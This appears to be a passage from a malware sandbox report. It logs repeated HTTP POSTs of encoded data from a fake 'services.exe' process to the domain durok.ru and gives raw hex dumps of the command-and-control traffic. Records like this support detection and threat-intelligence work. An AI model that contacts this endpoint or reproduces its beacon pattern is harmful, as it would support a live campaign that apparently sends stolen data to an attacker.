                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 11 29 29 27 1a 22 2c 02 57 2b 04 25 08 2a 08 25 5f 3f 32 2d 14 28 3c 25 0d 28 28 24 0e 37 04 0f 05 3d 29 3c 13 31 08 35 02 31 31 2e 5c 05 1d 24 06 3c 3b 2b 00 30 0c 03 1c 2b 3d 25 1f 3d 3e 31 18 24 3c 33 5b 23 28 3a 5d 22 32 38 5b 2c 2f 28 59 39 3c 3c 10 28 1e 22 11 36 3d 21 51 0c 1f 3b 0b 22 39 2c 00 27 3e 21 53 22 20 19 50 31 06 39 0b 22 3b 24 0e 24 5c 2f 5b 25 20 3b 1f 22 3e 24 0f 3f 2e 26 59 26 3c 26 01 3e 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$))'",W+%*%_?2-(<%(($7=)<1511.\$<;+0+=%=>1$<3[#(:]"28[,/(Y9<<("6=!Q;"9,'>!S" P19";$$\/[% ;">$?.&Y&<&>%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              14 | 192.168.2.4 | 49755 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:29.120820999 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:29.474538088 CET | 2548 | OUT | Data Raw: 59 5b 5e 5c 54 5f 59 51 5e 58 52 54 56 5d 58 5b 54 55 5b 54 56 5f 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[^\T_YQ^XRTV]X[TU[TV_S^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$^+?)!$^8?4!'7;[#?3#<:#(,)"Z.#Z*6
                                                                                                                              Dec 26, 2024 17:17:30.294440031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:30.546041965 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:30 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z1lePn3ZWb6oIce1L825QsZuy1B8cUBX8L5W%2FjLul4Q29ydRyVbymV4Qb1ve%2Ba4g9lIG%2FEP5KwX%2BgM3n8er6YbpWLWcTbqAVo38D3%2Bhtf9%2Bp6EgOUPYdzy1ybg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261a34bc70f69-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3426&min_rtt=1696&rtt_var=4096&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=93957&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              15 | 192.168.2.4 | 49756 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:30.795567989 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:31.174789906 CET | 2548 | OUT | Data Raw: 59 5d 5e 5f 51 59 59 54 5e 58 52 54 56 50 58 54 54 50 5b 5a 56 57 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^_QYYT^XRTVPXTTP[ZVWSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$]<" ?9"",&=':Y'4<7/8Q#X.*#+#;*"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:31.972302914 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:32.238660097 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:32 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2FxG5r4I81aKvalyXN0%2BoFwQXSwk6HtLYS4sPC6nIKVeins6sXHOCRTyng29XX%2F0iVgbHP2R3a80kp%2FzjEZu8pDOYt8%2BktsA%2F3M61nTnPvN1rRFv0n%2B62NvN6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261adcd3eb9c5-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8771&min_rtt=1953&rtt_var=14369&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=25840&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              16 | 192.168.2.4 | 49757 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:30.891957045 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:31.515649080 CET | 2108 | OUT | Data Raw: 59 5d 5b 5c 54 5d 59 5a 5e 58 52 54 56 5b 58 55 54 55 5b 54 56 5e 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y][\T]YZ^XRTV[XUTU[TV^S_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$?>)9V62<Z;='>07,(7,>,:0(V3>"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:17:32.069612026 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:32.322053909 CET | 950 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:32 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IWx6ytFm86SDzUqARbLGYZPDzGCJ%2B%2F%2F6idnN5jYCF%2BI7OPHb0tZiRv1p5XAFDlxvasxn0F1CT5JhL3xfV3vfJOIZzZe5NatkAHhMGf6bPq1eKh%2FbK4DvGJJ8MQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261ae6c0142a3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=9985&min_rtt=1605&rtt_var=17362&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2415&delivery_rate=21268&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5c 29 00 3b 1b 23 12 2f 0d 2b 2d 26 1b 2a 0f 21 5c 28 22 31 5f 28 59 22 54 2b 38 27 15 23 29 36 13 2a 04 0e 5c 26 0f 2d 01 32 1b 2e 5c 05 1d 27 16 2b 02 38 58 30 1c 0c 01 29 3d 26 46 28 2e 25 5b 33 06 2b 12 20 02 39 02 20 31 2f 03 2f 3f 3c 10 3a 12 30 12 28 09 2e 5c 35 17 21 51 0c 1f 38 52 21 17 0d 5a 31 10 07 1e 22 30 11 57 31 38 32 1d 21 38 3b 57 24 04 30 00 32 0d 05 55 23 3e 3c 0e 3f 03 22 12 24 2c 29 59 2a 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$\);#/+-&*!\("1_(Y"T+8'#)6*\&-2.\'+8X0)=&F(.%[3+ 9 1//?<:0(.\5!Q8R!Z1"0W182!8;W$02U#><?"$,)Y*%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              17 | 192.168.2.4 | 49758 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:32.480792046 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:32.833529949 CET | 2548 | OUT | Data Raw: 59 5f 5e 51 54 5b 5c 55 5e 58 52 54 56 51 58 53 54 56 5b 55 56 5f 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y_^QT[\U^XRTVQXSTV[UV_S^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+,?!6<,>*4&Y0$#4<;"/&:> ="Z.#Z*


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              18 | 192.168.2.4 | 49759 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:33.455077887 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:33.802400112 CET | 2128 | OUT | Data Raw: 59 5d 5e 5c 51 59 5c 56 5e 58 52 54 56 51 58 57 54 5c 5b 5a 56 52 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^\QY\V^XRTVQXWT\[ZVRSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[?<*)T!!?..">$:Y'4/X7,;4:X,)7($*5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:34.632436037 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:34.892355919 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:34 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDDZN4Jw9YKhSGkG3QCIfQHdfoG4xSvyqaf4lO%2BC6sHo9spopozvtO66zzuwiCSlaY1XjyR0KTbV2hMQWPHg4OhNt2MYCQMu%2B3x%2BeaXf%2Ftl%2F33MPk0aXSZ1ooA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261be6f891861-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4220&min_rtt=1774&rtt_var=5557&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=68406&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 00 3d 07 27 57 37 3c 28 55 2b 13 08 57 3e 0f 31 59 3f 31 29 58 28 01 0c 55 3c 06 0e 0f 34 2a 35 02 29 39 3c 5c 25 25 32 5d 24 31 2e 5c 05 1d 27 5c 3c 3b 2f 06 33 22 00 07 3d 07 25 1a 2a 2d 21 5c 24 11 24 02 20 15 07 07 20 21 20 58 38 3f 23 02 3a 3f 30 5f 2b 23 3d 04 35 17 21 51 0c 1f 3b 0c 21 17 3f 5e 27 2d 2a 0b 35 23 37 1d 26 38 00 56 36 05 0a 0f 30 3a 27 5a 31 0d 37 55 20 13 28 0b 3f 2e 39 02 25 2f 3a 04 29 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'='W7<(U+W>1Y?1)X(U<4*5)9<\%%2]$1.\'\<;/3"=%*-!\$$ ! X8?#:?0_+#=5!Q;!?^'-*5#7&8V60:'Z17U (?.9%/:)%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              19 | 192.168.2.4 | 49760 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:33.575426102 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:17:33.927407026 CET | 2548 | OUT | (POST body)
Dec 26, 2024 17:17:34.753442049 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:35.010122061 CET | 797 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:34 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztKAIv1sn7s1X8k4ad28BuJiC4LUnALad%2BLcx1rAJzeY6geuNAsepDzd2Ri5RKLphbH6lgSeTO%2Fgf6wwLnjuOvRQiGP7vEFQ5QDBH3NaJCq%2FidnCG7qjEjOzoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261bf299443e8-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8612&min_rtt=1694&rtt_var=14472&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=25595&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49761 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:35.331481934 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:17:35.677690029 CET | 2548 | OUT | (POST body)
Dec 26, 2024 17:17:36.489032984 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:36.741995096 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:36 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oQ6Rt2ZbGHtpu5nNOMqVxv3G%2FXZzB36hww4aprLCB3s%2BR0uPsYxIc%2FIe%2FWh9vfixffBBy%2Bkj2N1KwbGFq4UuSZh8grtkYKzUbI5JTWCDO9u%2FtUchYNgXH9oFhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261ca0d31f797-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8341&min_rtt=1623&rtt_var=14045&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=26368&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49762 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:36.019506931 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:17:36.364778042 CET | 2108 | OUT | (POST body)
Dec 26, 2024 17:17:37.194664955 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:37.450087070 CET | 943 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:37 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P5AIwzcPBKn%2FkT%2BPgSX9ofPI4sV9IyTww8i2IazkwIcIX5IeKzt5t2uwj9HMNsusv9F3fAclkkNMPHuEEulwJSMi9i8xM2SpUl7RI85xTd9iewrijDzyo7OieA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261ce6acb0f5d-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4187&min_rtt=1686&rtt_var=5634&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2415&delivery_rate=67299&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49763 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:37.468619108 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:17:37.818181992 CET | 2548 | OUT | (POST body)
Dec 26, 2024 17:17:38.645522118 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:38.902192116 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:38 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T5sqiC5HZHyv3o0uZyz5QrnSyGW1k%2FM8Y89mw%2FaWQ7nctG%2B0jhUxvw7QS8WZ2bso1%2BBbBmvavGFHgIvaLip5WKQ%2ByIQ0d%2BTGkTvy9JSQGSID5io3n6gvlKKpsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261d77dda0f99-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4483&min_rtt=1704&rtt_var=6197&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=60993&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49764 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:38.579726934 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:17:38.927218914 CET | 2128 | OUT | (POST body)
Dec 26, 2024 17:17:39.758711100 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:40.014126062 CET | 949 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:39 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqxY4nWCkfJM84mnRTWNzN3ytViGP5Fox20PgzYAWvi3XsdLLK1w%2Bh1UFgQdbV%2BYypBFJxGW1XZDTY9d1YrY%2B5lx3M9%2FShyx4IdLqkkrTBh67IS%2F7t5NlzzdcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261de7c8c431b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4073&min_rtt=1756&rtt_var=5293&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=71938&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49765 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:39.141527891 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
